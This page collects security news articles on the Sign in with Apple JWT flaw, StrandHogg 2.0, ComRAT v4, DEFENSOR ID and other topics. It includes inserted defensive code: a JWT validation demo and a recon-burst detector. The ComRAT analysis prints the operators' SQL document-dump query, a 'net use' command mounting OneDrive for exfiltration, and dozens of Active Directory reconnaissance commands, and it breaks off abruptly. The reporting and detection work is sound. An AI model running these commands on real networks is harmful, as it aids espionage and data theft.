Bug in ‘Sign in with Apple’ could have allowed account hijacking

The tech giant rewards the bug bounty hunter who found the severe flaw in its login mechanism with US$100,000

A bug bounty hunter has disclosed a severe flaw in Apple’s “Sign in with Apple” feature that, if exploited, could have allowed an attacker to hijack people’s accounts on major third-party services. According to Bhavuk Jain, any accounts on third-party apps and websites that used the authentication method but did not implement any additional security measures of their own were at risk.

Jain discovered the bug in April and went on to report it to Apple, which rewarded him with US$100,000 under the company’s Security Bounty program. The Indian bug bounty hunter said that Apple investigated their logs and didn’t find records of any account compromise or misuse stemming from the vulnerability. The bug has since been patched, although Apple has yet to comment publicly on Jain’s findings.

Here’s my first 6 digit bounty from @Apple. Blog post will be up next week. #bugbounty pic.twitter.com/QygxvtGYJb

— Bhavuk Jain (@bhavukjain1) May 24, 2020

Jain notes that there are two ways “Sign in with Apple” authenticates users – either by using a JSON web token (JWT) directly, or via a code generated by Apple’s servers that is then exchanged for a JWT. When signing in, the user has the option of either sharing the email address associated with their Apple ID with the third-party app or withholding it.

In the latter scenario, a user-specific Apple relay Email ID is generated. Once authorization is successful, Apple generates a JWT containing the Email ID, which is used by the third-party app to log the user in. Due to missing validation, however, there was a way to subvert the process involving the JWT to hijack a user’s account – and it only required knowing the target’s email ID.

“I found I could request JWTs for any Email ID from Apple and when the signature of these tokens was verified using Apple’s public key, they showed as valid. This means an attacker could forge a JWT by linking any Email ID to it and gaining access to the victim’s account,” said Jain.
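The relying-party side of the flow described above, as an added example that is not code from the article, from Jain, or from Apple: a stand-in identity provider issues signed tokens; one login routine does what the article warns about and trusts the email claim of any validly signed token, while a stricter one pins the signing algorithm, checks issuer, audience and expiry, ties the token to the pending login through its nonce, and identifies the account by the stable `sub` claim rather than by email. The key, issuer string, client id, nonce and subject values are all constructed for the demo, and HS256 with a shared secret stands in for Apple’s RS256 public-key signature so the code needs no third-party library; the claim checks are the same in either case.

```python
import base64
import hashlib
import hmac
import json

# Constructed values for this example (not Apple's, not any real relying party's).
IDP_KEY = b"constructed-demo-signing-key"       # HS256 stand-in for the IdP's RS256 key pair
IDP_ISSUER = "https://idp.example"              # constructed issuer identifier
DEMO_NOW = 1_590_000_000                        # fixed "current time" so results are stable
DEMO_SESSION = {"client_id": "com.example.app", "nonce": "nonce-7f3a"}  # RP's pending login


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(claims: dict, key: bytes = IDP_KEY) -> str:
    """Stand-in for the identity provider: sign whatever claim set it is handed."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_signature(token: str, key: bytes) -> bool:
    """True only if the token has three parts, the expected algorithm and a matching MAC."""
    parts = token.split(".")
    if len(parts) != 3:
        return False
    try:
        header = json.loads(_b64url_decode(parts[0]))
        sig = _b64url_decode(parts[2])
    except ValueError:                      # bad base64 or bad JSON
        return False
    if header.get("alg") != "HS256":        # pin the algorithm the RP expects
        return False
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def claims_of(token: str) -> dict:
    return json.loads(_b64url_decode(token.split(".")[1]))


def login_by_email(token: str, key: bytes):
    """Weak pattern: a valid signature is taken as proof that the email claim is the user."""
    if not verify_signature(token, key):
        return None
    return claims_of(token).get("email")


def login_strict(token: str, key: bytes, session: dict, now: int):
    """Validate the token against this RP's pending login; identify the user by `sub`."""
    if not verify_signature(token, key):
        return None
    c = claims_of(token)
    if c.get("iss") != IDP_ISSUER:                         # issued by the IdP we trust
        return None
    if c.get("aud") != session["client_id"]:               # issued for this app, not another
        return None
    if not isinstance(c.get("exp"), int) or c["exp"] <= now:
        return None
    if not hmac.compare_digest(str(c.get("nonce", "")), session["nonce"]):
        return None                                        # not the login we started
    return c.get("sub")   # stable account identifier; email stays descriptive only


def demo_tokens() -> dict:
    """Constructed tokens: genuine, another subject carrying alice's email, expired, wrong audience."""
    base = {"iss": IDP_ISSUER, "aud": "com.example.app", "exp": DEMO_NOW + 600, "nonce": "nonce-7f3a"}
    return {
        "genuine": issue_token({**base, "sub": "001.alice", "email": "alice@example.com"}),
        "other_email": issue_token({**base, "sub": "002.mallory", "email": "alice@example.com"}),
        "expired": issue_token({**base, "sub": "001.alice", "email": "alice@example.com", "exp": DEMO_NOW - 1}),
        "wrong_aud": issue_token({**base, "aud": "com.other.app", "sub": "001.alice"}),
    }


if __name__ == "__main__":
    for name, tok in demo_tokens().items():
        print(f"{name:12s} by_email={login_by_email(tok, IDP_KEY)!r:24s} "
              f"strict={login_strict(tok, IDP_KEY, DEMO_SESSION, DEMO_NOW)!r}")
```

The point of the `other_email` token is that a signature check alone cannot tell it apart from a genuine one: both are correctly signed by the identity provider. A relying party that keys accounts on the email claim logs that token in as alice; one that keys on `sub` and checks the rest of the claims logs it in as whoever the provider actually authenticated.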

The Cupertino tech giant requires developers to add a “Sign in with Apple” option whenever other forms of social logins (Facebook, Google) are available. The feature is used by countless major services, such as Spotify, Airbnb, Adobe, eBay, and Dropbox, to name a few.

Earlier this year, a pair of severe security vulnerabilities was found in the iOS Mail app, which comes pre-installed on all iOS devices. The flaws have since been patched and an update has been rolled out to the public.

1 Jun 2020 – 05:10PM

3 things to discuss with your kids before they join social media

What are some of the key things your children should know about before they make their first foray into social media?

Since technology has permeated every facet of life, social media has become a daily part of it. Adults are not the only ones flocking to social sites; an increasing number of children are too. Children actually have their own social networks on which they can start their journey; those are usually marketed as moderated safe havens where children can interact while parents have a degree of oversight of their activities. Even Facebook has introduced a kids’ version of its messenger app.

However, these are moderated, curated and safe spaces that children eventually leave when they reach a certain age. So, what can you do to make your children’s transition to more adult-centric social networks as safe and smooth as possible? As we mark International Children’s Day and the Global Day of Parents, let’s take a look at some of the discussions you should have with your children before they join Facebook, Instagram, TikTok or other social networking sites.

Are you sure you want to share that?

“What goes on the internet stays on the internet” is a mantra almost as old as the internet itself. It is something most adults tend to forget, though it bears repeating every time they consider sharing anything online. The same mantra should be emphasized to children who are about to join social networks geared toward adults.

If they want to post or share something, they should always think about how it would reflect on them in the future. Although it may prove to be a difficult task to discuss such a topic with teenagers, it’s nevertheless important. A good rule of thumb before posting anything would be for them to ask themselves what an older relative (a grandparent for example) would say, if they saw the content.

RELATED READING: At what age should kids be able to access online services?

Perhaps another teaching moment could be to point out how a youthful indiscretion could come back to haunt them, or invalidate their career choices or even university applications in the future. Unfortunately, there are myriad examples of how tweets, forum posts and even yearbook photos and comments have come back to haunt entertainers, sports figures, and public officials alike.

Do you really know that person?

“Don’t talk to strangers” is perhaps one of the most repeated sentences a child hears growing up. The point is hammered home not just by parents, but by teachers, public service announcements, kids’ shows, and so on. So, while many teens may consider social networks safer because they’re online and “it doesn’t count”, parents should clearly communicate that the risks are the same and, in some cases, may even prove to be worse.

Unfortunately, you can illustrate the risks using countless examples of horror stories involving teenagers who were groomed online by child predators and eventually fell victim to them. Alternatively, there are multiple movies and TV series episodes dealing with the topic of interacting with strangers online, as one ancient proverb says: “it’s better to see something once than to hear about it a thousand times.” Black Mirror is one such show that deals with the dark side of technology and connected life, albeit in a more sci-fi mode.

Privacy settings

When adults sign up to a social network, they are rarely in a hurry to go through their privacy settings, so it can’t be expected of teenagers to be any more meticulous, even if they were born into a connected world. Another thing to keep in mind is that social networks continuously update their privacy and security settings to keep up with the increased scrutiny of the general public and governments alike. Therefore, instilling in teenagers a sense of responsibility about how their data is handled and viewed is very important.

To that end, some social networks started introducing tools that allow you to conduct reviews of your privacy. Facebook, for example, has the Privacy Checkup. This comprehensive tool allows you to look at your profile through the eyes of different types of viewers, ranging from friends to strangers, so you can more easily choose what you want to share and with whom. Another nifty option lets you audit who can see your past and future posts. You can read through our article on Facebook privacy settings to have a better grasp of what options you have to secure both your and your teen’s privacy.

Final thoughts

Raising a child in a more digitalized world can prove to be a challenge, especially since times have changed and a lot of the options and technologies weren’t around when you were growing up. On the other hand, it is important not to shy away from these challenges and to prepare your kids for the obstacles they will face in the digital world as well as in the real one, since they are deeply intertwined. By talking to your children about the risks and pitfalls of social media and how to handle them responsibly, you can prepare them better for adulthood and protect them – as well as rest easier – since they will be more vigilant online.

To learn more about the dangers children face online, as well as about how technology and other measures can help, head over to Safer Kids Online.

1 Jun 2020 – 11:30AM

Week in security with Tony Anscombe

New ESET research into Turla’s malicious toolkit – GDPR turns two – Critical flaw in Android devices

This week, ESET researchers published their analysis of a new version of ComRAT – one of the oldest malware families used by the Turla group to breach a number of high-profile targets, including the US military way back in 2008. As the European Union’s GDPR turns two, are companies taking privacy and consent more seriously and do individuals engage in the protection of their personal information more? Nearly all versions of Android have been found to be affected by a critical vulnerability dubbed StrandHogg 2.0. All this – and more – on WeLiveSecurity.com.

People know reusing passwords is risky – then do it anyway

And most people don’t change their password even after hearing about a breach, a survey finds

While nearly all respondents in a recent survey were aware of the risks associated with poor password hygiene, most people don’t do anywhere near enough to keep attackers at bay, the third installment of the LastPass Psychology of Passwords Report has revealed.

As many as 9 in 10 respondents surveyed by the password manager purveyor acknowledged knowing that recycling the same password, or using a variation of it, across multiple accounts was risky. Still, two-thirds used the same password or a derivative for all their online accounts, which is actually an increase of 8 percentage points from the survey conducted in 2018. The new edition of the survey took place in March of this year and canvassed opinions from 3,250 people on various continents.

The report also reveals that 53% of respondents haven’t changed their password in the last year even after they heard about a breach in the news. Also, 4 in 10 people believe that having an easy-to-remember password is more important than a secure password. Apparently some take it a bit too far, since studies have shown that year after year, passwords such as “12345”, “123456” and “123456789” top the lists of the most popular passwords.

One of the reasons people don’t apply proper password hygiene is that they underestimate the risk. In fact, 4 in 10 think that their accounts aren’t worth the hacking effort. One thing to remember is that everyone is a target. Your information can be part of a breach that involves millions of stolen credentials. That data can then be used to piece together other information, since if you recycle your passwords, bad actors can gain access to other services, including your online banking.

RELATED READING: How to spot if your password was stolen in a security breach

Speaking of which, almost three-quarters of respondents concurred that financial accounts need extra protection. About half said that email accounts needed stronger passwords, since those are usually at the center of people’s digital identities and can contain tons of exploitable data. A third of respondents consider medical records sensitive enough to require protection by stronger passwords as well.

Luckily, most respondents realize that there are additional steps they can take to secure their accounts, such as multi-factor authentication (MFA). Only 1 in 5 were unaware of what MFA is, while over half said that they use it to secure their personal accounts and 37% use it at work.

To sum it up, you should avoid creating simple passwords and recycling them across accounts – two of the common password mistakes people make. Instead, opt for long passphrases, consider using a password manager and add that extra protection layer with MFA, whenever available.

28 May 2020 – 05:01PM

Critical Android flaw lets attackers hijack almost any app, steal data

Left unpatched, the vulnerability could expose almost all Android users to the risk of having their personal data intercepted by attackers

Researchers have found a critical flaw that affects nearly all devices running Android 9.0 or older, which implies that over 90% of Android users could be vulnerable. If exploited, the security hole allows hackers to hijack almost any app and steal victims’ sensitive data, according to researchers at Promon, who uncovered the vulnerability and dubbed it StrandHogg 2.0.

The good news is that malware exploiting the vulnerability has not been observed in the wild. Importantly, Google provided a patch to Android device makers in April 2020, with the fix – for Android versions 8.0, 8.1 and 9.0 – being rolled out to the public as part of the latest assortment of monthly security updates throughout this month. Promon notified Google about the vulnerability in early December 2019.

Indexed as CVE-2020-0096, the elevation of privilege flaw resides in the Android system component and can be abused through a method called reflection that allows malicious apps to impersonate legitimate applications while the victim is none the wiser. As a result, once a malicious app is downloaded and installed on a vulnerable device, an attacker could steal the victim’s access credentials, record conversations, track their movements via GPS, or access stored data such as photos or messages.

Let’s say a malicious app sneaks into your device and you click on a legit app that requires your access credentials. Instead of that app, however, the data-stealing overlay is displayed. You go on to enter your credentials and those are immediately transferred to the criminal, who now has control of this app. It isn’t just the credentials that are at risk – the app can hijack permissions that are being granted to apps, notably access to the GPS, microphone, or camera. Most apps are vulnerable to the attack by default.



The research team pointed out that compared to StrandHogg, its “less evil twin”, the newly disclosed flaw is much more difficult to detect because of its code-based execution. It can also “dynamically attack nearly any app on a given device simultaneously at the touch of a button”, whereas StrandHogg could only attack apps one at a time.

Promon theorizes that cybercriminals would probably exploit both vulnerabilities in unison since they can attack devices in different ways, while at the same time many measures used to mitigate one vulnerability cannot be applied to the other.

To protect yourself against StrandHogg 2.0, you should update your Android device to the latest available OS version. Generally speaking, it’s also important to have a reputable mobile security solution in place and to be very cautious about installing apps from outside Google Play.

27 May 2020 – 05:16PM

Crooks threaten to leak customer data stolen from e‑commerce sites

A hack-and-extort campaign takes aim at poorly secured databases replete with customer information that can be exploited for further attacks

A number of e-commerce websites from multiple continents have had their customer databases stolen, with an unknown seller offering at least 1.62 million rows of personal records for sale on a public website. The online stores – based in Germany, the United States, Brazil, Italy, India, Spain, and Belarus – have also received ransom notes as the cybercriminals threaten to release the data if the retailers don’t pay up within 10 days.

According to BleepingComputer – which broke the story and listed some of the hacked merchants – the loot may actually be far larger than what has been put up for sale. The siphoned information varies depending on the ransacked retailer and includes email addresses, hashed passwords, postal addresses, gender and dates of birth.

Cybercriminals can use this Personally Identifiable Information (PII) for all manner of nefarious activities, including identity theft or targeted phishing attacks. The least you as a customer can do is to change your password on the site(s) and keep an eye out for suspicious emails.

It remains unclear who the thieves are, but apparently they targeted unsecured or ill-secured servers that can be found on the public web. They copied the stores’ SQL databases and now demand a ransom of 0.06 bitcoin (some US$537 at today’s rate) within 10 days on pain of publishing or using the data as they see fit.

The attackers also offer unspecified proof, which one might assume is a sample of the data. Some of the shops may have taken them up on their word, since the hackers’ BTC wallets have recently recorded transactions amounting to 5.8 bitcoin (approximately US$52,000).

Speaking of which, paying the ransom to a cybercriminal may prove to be a leap of faith, since you have no way of knowing if they won’t sell your data onwards even if they return it. Ransomware victims may face a similar conundrum, as discussed in this article.

BleepingComputer estimates that around 31 stolen databases have been put up for sale. Based on the number of abuse reports filed against the hackers’ bitcoin addresses, the site believes it to be just a fraction of the overall number. The most recent database is from March and each listing contains a sample of the data, so that potential buyers can check the wares.

Given the wealth of personal data that they may store on their customers, e-commerce sites pose a juicy target for bad actors. Hack-and-extort campaigns, meanwhile, are by no means a novel approach and high-profile incidents have affected, for example, well-known names in the entertainment industry, including HBO in 2017. Just days ago, an entertainment law firm also fell victim to a similar attack.

26 May 2020 – 08:44PM

From Agent.BTZ to ComRAT v4: A ten‑year journey

Turla has updated its ComRAT backdoor and now uses the Gmail web interface for Command and Control

ESET researchers have found a new version of one of the oldest malware families run by the Turla group, ComRAT. Turla, also known as Snake, is an infamous espionage group that has been active for more than ten years. We have previously described many campaigns attributed to this group.

ComRAT, also known as Agent.BTZ and to its developers as Chinch, is a Remote Access Trojan (RAT) that became infamous after its use in a breach of the US military in 2008. The first version of this malware, likely released in 2007, exhibited worm capabilities by spreading through removable drives. From 2007 to 2012, two new major versions of the RAT were released. Interestingly, both employed the well-known Turla XOR key:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

Until mid-2017, the Turla developers made a few changes to ComRAT, but these variants were apparently still derived from the same code base.

Then, in 2017, we noticed that a very different version of ComRAT had been released. This new version used a completely new code base and was far more complex than its predecessors. Here are the main characteristics of this malware family:

ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020.
We identified at least three targets: two Ministries of Foreign Affairs and a national parliament.
ComRAT was used to exfiltrate sensitive documents. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data.
ComRAT is a complex backdoor developed in C++.
ComRAT uses a Virtual FAT16 File System formatted in FAT16.
ComRAT is deployed using existing access methods, such as the PowerStallion PowerShell backdoor.
ComRAT has two Command and Control channels:
  HTTP: It uses exactly the same protocol as ComRAT v3
  Email: It uses the Gmail web interface to receive commands and exfiltrate data
ComRAT can perform many actions on the compromised computers, such as executing additional programs or exfiltrating files.

Attribution to Turla

Based on the victimology and the TTPs, we believe that ComRAT is used exclusively by Turla. There are a few elements linking ComRAT v4 to Turla:

It uses the same internal name, Chinch, as the previous versions
It uses the same custom C&C protocol over HTTP as ComRAT v3
A part of the network infrastructure is shared with another Turla malware family, Mosquito
It was dropped by, or has dropped other, Turla malware families:
  A customized PowerShell loader
  The PowerStallion backdoor
  The RPC backdoor

Insight into attacker’s activity

During our investigation, we were able to gain insights about what Turla operators were doing on the compromised machines.

The main use of ComRAT is stealing confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents. Figure 1 is the redacted SQL command.

sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>" + num4.ToString();

sqlCommand.CommandText += " and datalength(img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf' or (filename like '3%.pdf' and len(filename)>9))";

sqlCommand.CommandText += " order by id";

Figure 1. SQL command to dump documents from the central database (partially redacted)

These documents were then compressed and exfiltrated to a cloud storage provider such as OneDrive or 4shared. Cloud storage is mounted using the net use command as shown in Figure 2.

tracert -h 10 yahoo.com

net use  https://docs.live.net/E65<redacted> <redacted password> /u:<redacted>@aol.co.uk

tracert -h 10 yahoo.com

Figure 2. Command to mount a OneDrive folder using net use (partially redacted)

In addition to document stealing, the operators also run many commands to gather information about the Active Directory groups or users, the network, or Microsoft Windows configurations such as the group policies. Figure 3 is a list of commands executed by Turla operators.


gpresult /z

gpresult /v

gpresult

net view

net view /domain

netstat

netstat -nab

netstat -nao

nslookup 127.0.0.1

ipconfig /all

arp -a

net share

net use

systeminfo

net user

net user administrator

net user /domain

net group

net group /domain

net localgroup

net localgroup

net localgroup Administrators

net group "Domain Computers" /domain

net group "Domain Admins" /domain

net group "Domain Controllers" /domain

dir "%programfiles%"

net group "Exchange Servers" /domain

net accounts

net accounts /domain

net view 127.0.0.1 /all

net session

route print

ipconfig /displaydns

Figure 3. Basic recon of the compromised machine
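The recon sequence in Figure 3 is a good detection opportunity, because a normal user rarely runs a dozen different enumeration commands within a few minutes. As an added example (not ESET code, and not anything from the ComRAT samples), the detector below takes process-creation log lines, matches the command names from Figure 3 as prefixes, and alerts when one host/user pair runs at least five distinct recon commands inside a ten-minute window. The log format, host names, user names and timestamps are constructed for the example; a real source such as Sysmon event 1 or Windows event 4688 carries the same fields.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command families from the Figure 3 list, matched at the start of the command line.
RECON_RE = re.compile(
    r"^(gpresult\b|net\s+(view|share|use|user|group|localgroup|accounts|session)\b"
    r"|netstat\b|nslookup\b|ipconfig\b|arp\s+-a\b|systeminfo\b|route\s+print\b)",
    re.IGNORECASE,
)

# Constructed log format: "<date> <time> host=<h> user=<u> cmd=<command line>".
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.+)$"
)

# Constructed sample: one workstation runs a burst of recon, a helpdesk host runs two
# unrelated commands hours apart, and one ordinary program launch is mixed in.
SAMPLE_LOG = """\
2020-03-12 09:14:02 host=WS-FIN-07 user=CORP\\j.doe cmd=gpresult /z
2020-03-12 09:14:05 host=WS-FIN-07 user=CORP\\j.doe cmd=net view /domain
2020-03-12 09:14:09 host=WS-FIN-07 user=CORP\\j.doe cmd=netstat -nao
2020-03-12 09:14:15 host=WS-FIN-07 user=CORP\\j.doe cmd=ipconfig /all
2020-03-12 09:14:20 host=WS-FIN-07 user=CORP\\j.doe cmd=net user /domain
2020-03-12 09:14:31 host=WS-FIN-07 user=CORP\\j.doe cmd=net group "Domain Admins" /domain
2020-03-12 09:14:40 host=WS-FIN-07 user=CORP\\j.doe cmd=net localgroup Administrators
2020-03-12 09:15:02 host=WS-FIN-07 user=CORP\\j.doe cmd=systeminfo
2020-03-12 09:20:00 host=WS-FIN-07 user=CORP\\j.doe cmd=notepad.exe report.docx
2020-03-12 08:00:00 host=WS-IT-02 user=CORP\\helpdesk cmd=ipconfig /all
2020-03-12 16:30:00 host=WS-IT-02 user=CORP\\helpdesk cmd=net use
"""


def parse_line(line):
    """Return a dict with ts/host/user/cmd, or None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def is_recon(cmd):
    return RECON_RE.match(cmd.strip()) is not None


def find_recon_bursts(lines, window=timedelta(minutes=10), threshold=5):
    """Alert once per (host, user) that runs >= threshold distinct recon commands within window.

    The sliding window keeps the densest qualifying span so the alert lists every
    distinct command seen in it, not just the first few that crossed the threshold."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_recon(rec["cmd"]):
            events[(rec["host"], rec["user"])].append(rec)

    alerts = []
    for (host, user), evs in events.items():
        evs.sort(key=lambda r: r["ts"])
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:   # drop events older than the window
                start += 1
            distinct = sorted({r["cmd"].strip().lower() for r in evs[start:end + 1]})
            if len(distinct) >= threshold and (best is None or len(distinct) > len(best["commands"])):
                best = {"host": host, "user": user, "first": evs[start]["ts"],
                        "last": evs[end]["ts"], "commands": distinct}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in find_recon_bursts(SAMPLE_LOG.splitlines()):
        print(f"{a['host']} {a['user']}: {len(a['commands'])} distinct recon commands "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
        for c in a["commands"]:
            print("   ", c)
```

Counting distinct commands rather than raw events keeps a script that polls `netstat` every few seconds from tripping the rule, and keying on host and user together separates an administrator’s routine `ipconfig` from a burst on a finance workstation. The threshold and window are starting points to tune against a site’s own baseline.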

Finally, we also noticed that Turla operators are aware of and try to evade security software. For instance, they regularly exfiltrate security-related log files in order to understand whether their malware samples have been detected. This shows the level of sophistication of this group and its intention to stay on the same machines for a long time.

Technical analysis

According to its compilation timestamp, which is likely genuine, the first known sample of ComRAT v4 was compiled in April 2017. The most recent iteration of the backdoor we’ve seen was, to the best of our knowledge, compiled in November 2019.

Based on ESET telemetry, we believe that ComRAT is installed using an existing foothold such as compromised credentials or via another Turla backdoor. For instance, we’ve seen ComRAT installed by PowerStallion, their PowerShell-based backdoor we described in 2019.

The ComRAT installer is a PowerShell script that creates a Windows scheduled task and fills a Registry value with the encrypted payload.

ComRAT v4 has several components:

an orchestrator, injected into explorer.exe. It controls most of ComRAT functions including the execution of backdoor commands.
a communication module

Two years later, has GDPR fulfilled its promise?

Has the landmark law helped build a culture of privacy in organizations and have consumers become more wary of sharing their personal data?

“Relying on the government to protect your privacy is like asking a peeping Tom to install your window blinds” – John Perry Barlow, EFF (July 1992).

Any individual who has the slightest engagement in the privacy of their personal data online will likely be sympathetic to Barlow’s quote. It’s been 2 years since the implementation of the General Data Protection Regulation (GDPR), the EU’s data protection and privacy regulation which aimed to give control to individuals over their personal data and to simplify the requirements on businesses.

Are there fewer data breaches? Are companies taking privacy and consent more seriously? Do individuals engage in the protection of their personal information more? It’s difficult to answer the question of whether GDPR has been successful as we don’t know what would have been the state of play if the data protection regulation it succeeded was still in place.

Without doubt, though, the global privacy landscape changed with GDPR. The legislation placed the privacy conversation front and center in capitals and board rooms around the world. There are now in excess of 100 countries and states with individual privacy regulations, some more strict than others, and some of them, such as Argentina, Brazil, Chile, Japan, Kenya, South Korea and California, have clearly taken GDPR as a base model for their own legislation.

The growing number of regulations around the world demonstrates both the need and the willingness of governing bodies to step in, but with the growing number a complexity is created, something I discussed in a recent blogpost. The complexities of so many regulations probably mean that companies will look to harmonize their approach to privacy to comply with the majority and have a defensible position should they inadvertently breach a regulation.

Corporations, I am sure, have taken heed as regulators tasked with enforcing the GDPR started flexing their muscles and issuing fines or giving notice of intended fines. The first major fine, of €50 million (US$54 million), was issued in January 2019 to Google by the French data protection authority CNIL for showing insufficient control, consent and transparency over the use of personal data for behavioral advertising.

This was eclipsed by a mammoth £183 million (US$221 million) fine issued by the British Information Commissioner’s Office (ICO) against British Airways in July 2019 for poor security that resulted in a malicious attack that affected 380,000 website transactions. In comparison, Facebook was fined a mere £500,000 (US$605,000) by the ICO regarding the Cambridge Analytica scandal, which happened shortly before the implementation of GDPR and was the maximum fine at the time.

What’s the law got to do with it?

As a consumer, if you are in a country where privacy legislation has taken a similar approach to the GDPR, you will be used to seeing the numerous consent dialogues that companies are now required to display when collecting your personal data. The bold position of requiring opt-in consent set the bar for future legislation by other authorities; even if opt-out became the chosen route, the prominence of the message, which can probably, in part, be attributed to GDPR, at least gives the consumer the opportunity to make an informed decision.

There has also been a sea change in product and service development, and this too can probably, in part, be attributed to the GDPR. At the inception of a new product or service, privacy by design and default is now a relatively standard approach for any team to consider as projects come to fruition. Consumers now expect a trusted relationship with a vendor, and the vendor understands that this will bring long-term commercial success.

It seems impossible to write this blogpost without mentioning the current COVID-19 predicament, with the numerous contact-tracing apps and location mapping data being provided to governments by telecom carriers. While privacy may have been put on hold in some cases, or at least modified to a point that in normal circumstances would be unacceptable, the visibility of personal information privacy that both the GDPR and the Cambridge Analytica scandal created has caused global scrutiny of the use of data to help solve the current pandemic. This scrutiny has seen governments backtrack on proposals and technology companies innovate new methods to ensure anonymity; there’s also a general consensus that a contact-tracing app needs to respect the user’s right to privacy.

The GDPR has legitimized privacy advocates across the globe having a voice and having their concerns considered and listened to. The big question, though, remains: ‘Have citizens become the owners of their personal data?’ I leave you with an inspired quote from the late Steve Jobs…

“Privacy means people know what they’re signing up for, in plain language, and repeatedly. I believe people are smart. Some people want to share more than other people do. Ask them.” – Steve Jobs

25 May 2020 – 11:30AM

Week in security with Tony Anscombe

ESET research into Winnti Group’s new backdoor – A dangerous Android app under the microscope – The BIAS Bluetooth bug

ESET researchers have published a deep-dive into a new backdoor, PipeMon, that the Winnti Group has deployed against several video gaming companies in Asia. Also this week, ESET researchers released their analysis of “DEFENSOR ID”, a particularly insidious banking trojan that had snuck into Google Play. Academics disclosed a security flaw in the Bluetooth protocol that left a wide range of devices vulnerable to the so-called BIAS attacks. All this – and more – on WeLiveSecurity.com.

Insidious Android malware gives up all malicious features but one to gain stealth

ESET researchers detect a new way of misusing Accessibility Service, the Achilles’ heel of Android security

ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions, notably wiping out the victim’s bank account or cryptocurrency wallet and taking over their email or social media accounts. Called “DEFENSOR ID”, the banking trojan was available on Google Play at the time of the analysis. The app is fitted with standard information-stealing capabilities; however, this banker is exceptionally insidious in that after installation it requires a single action from the victim – enable Android’s Accessibility Service – to fully unleash the app’s malicious functionality.

The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth. Its creators reduced the app’s malicious surface to the bare minimum by removing all potentially malicious functionalities but one: abusing Accessibility Service.

Accessibility Service has long been known to be the Achilles’ heel of the Android operating system. Security solutions can detect it in countless combinations with other suspicious permissions and functions, or malicious functionalities – but when faced with no additional functionality or permission, all failed to trigger any alarm on DEFENSOR ID.

By “all” we mean all security mechanisms guarding the official Android app store (including the detection engines of the members of the App Defense Alliance) and all security vendors participating in the VirusTotal program (see Figure 1).

Figure 1. According to the VirusTotal service, no security vendor detected the DEFENSOR ID app until it was pulled off the Play store

DEFENSOR ID was released on Feb 3, 2020 and last updated to v1.4 on May 6, 2020. The latest version is analyzed here; we weren’t able to determine if the earlier versions were also malicious. According to its profile at Google Play (see Figure 2) the app reached a mere 10+ downloads. We reported it to Google on May 16, 2020 and since May 19, 2020 the app has no longer been available on Google Play.

The developer name used, GAS Brazil, suggests the criminals behind the app targeted Brazilian users. Apart from including the country’s name, the app’s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia. That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking. However, there is also an English version of the DEFENSOR ID app (see Figure 3) besides the Portuguese one, and that app has neither geographical nor language restrictions.

Playing further off the suggested GAS Tecnologia link, the app promises better security for its users. The description in Portuguese promises more protection for the user’s applications, including end-to-end encryption. Deceptively, the app was listed in the Education section.

Figure 2. The DEFENSOR ID app on Google Play – Portuguese version (translates roughly as: “Your new Defensor app available for: / Individuals / Legal entities / From now on you will have more protection when using your applications, encryption for end-to-end users”)

Figure 3. The DEFENSOR ID app on Google Play – English version

Functionality

After starting, DEFENSOR ID requests the following permissions:

allow modifying system settings, permit drawing over other apps, and activate accessibility services.

If an unsuspecting user grants these permissions (see Figure 4), the trojan can read any text displayed in any app the user may launch – and send it to the attackers. This means the attackers can steal the victim’s credentials for logging into apps, SMS and email messages, displayed cryptocurrency private keys, and even software-generated 2FA codes.

Since the trojan can steal the victim’s credentials and also read their SMS messages and generated 2FA codes, DEFENSOR ID’s operators can bypass two-factor authentication. This opens the door to, for example, fully controlling the victim’s bank account.

To make sure the trojan survives a device restart, it abuses the already activated accessibility service, which relaunches the trojan right after boot.


Figure 4. The permission requests by DEFENSOR ID

Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server, such as uninstalling an app, or launching an app and then performing any click/tap action remotely controlled by the attacker (see Figure 5).

Figure 5. The list of commands DEFENSOR ID may get from its C&C server

In 2018, we saw similar behavior, but all the click actions were hardcoded and suited only for the app of the attacker’s choice. In this case, the attacker can get the list of all installed apps and then remotely launch the victim’s app of their choice to either steal credentials or perform malicious actions (e.g. send funds via a wire transfer).

